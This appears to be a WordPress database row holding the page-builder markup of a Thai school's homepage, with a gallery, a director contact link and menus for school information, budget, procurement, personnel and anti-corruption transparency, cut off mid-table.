(329,1,'2024-08-01 09:55:34','2024-08-01 02:55:34','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder\\u0026p=328\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift 